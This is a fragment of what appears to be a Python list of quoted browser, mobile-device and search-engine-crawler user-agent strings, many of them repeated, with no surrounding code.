'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
